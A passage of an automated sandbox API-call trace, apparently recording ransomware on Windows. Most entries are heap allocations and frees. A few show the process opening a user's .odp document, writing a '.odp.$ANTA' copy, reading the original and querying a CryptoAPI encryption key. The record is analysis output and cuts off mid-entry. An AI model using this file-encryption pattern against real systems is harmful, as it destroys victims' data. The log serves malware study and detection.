lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0076.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0076.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0076.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0076.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0076.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0076.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0076.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0076.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0076.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0076.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0076.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0076.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0076.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0076.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0076.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0076.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0076.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0076.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0076.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0076.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0076.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0076.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0076.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0076.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0076.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0076.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0076.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0076.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0076.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0076.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0076.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0076.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0076.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0076.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0076.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0076.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0076.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0076.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0076.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0076.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0076.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0076.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0076.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0076.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0076.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0076.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0076.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0076.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0076.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0076.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0076.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0076.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0076.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0076.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0076.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0076.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0076.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0076.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0076.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0076.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0076.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0076.838] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0076.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0076.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0076.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0076.838] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0076.838] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0076.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.838] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Lh2OVLi_4PS_2RxxQd.odp" (normalized: "c:\\users\\fd1hvy\\documents\\lh2ovli_4ps_2rxxqd.odp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0076.838] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.838] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0076.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0076.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0076.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0076.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0076.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0076.839] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0076.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0076.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0076.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0076.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0076.839] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0076.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0076.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0076.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0076.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0076.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0076.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0076.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e400 | out: hHeap=0x1780000) returned 1 [0076.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0076.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0076.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0076.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0076.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0076.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0076.840] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0076.840] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Lh2OVLi_4PS_2RxxQd.odp.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\lh2ovli_4ps_2rxxqd.odp.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0076.843] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0076.843] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x83cc, lpOverlapped=0x0) returned 1 [0076.845] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0076.848] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0076.848] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0076.848] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0076.848] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.848] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.848] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0076.848] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796ee8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0076.848] CryptGetKeyParam (in: hKey=0x41ac700, dwParam=0x7, pbData=0x43e2680, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2680*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0076.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0076.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9e90 [0076.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0076.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0076.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0076.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0076.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0076.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0076.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0076.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0076.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0076.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0076.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0076.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0076.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0076.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0076.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0076.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0076.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0076.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ea8 [0076.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0076.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0076.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0076.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0076.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0076.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0076.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0076.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0076.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0076.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0076.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0076.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0076.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0076.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0076.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0076.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0076.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0076.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9a40 [0076.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0076.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0076.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0076.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0076.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0076.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0076.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0076.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0076.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e93c8 [0076.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0076.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0076.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0076.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0076.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0076.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0076.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0076.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0076.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0076.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0076.851] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0076.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0076.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0076.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0076.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0076.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0076.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0076.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0076.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0076.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0076.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0076.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0076.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea2e0 [0076.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0076.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0076.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0076.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0076.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0076.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0076.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0076.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0076.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0076.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0076.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0076.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0076.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0076.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0076.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0076.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0076.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0076.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0076.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0076.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0076.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0076.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0076.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0076.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0076.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0076.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0076.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0076.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0076.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0076.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0076.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0076.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0076.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0076.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0076.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0076.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0076.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0076.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0076.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0076.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0076.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0076.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0076.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0076.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 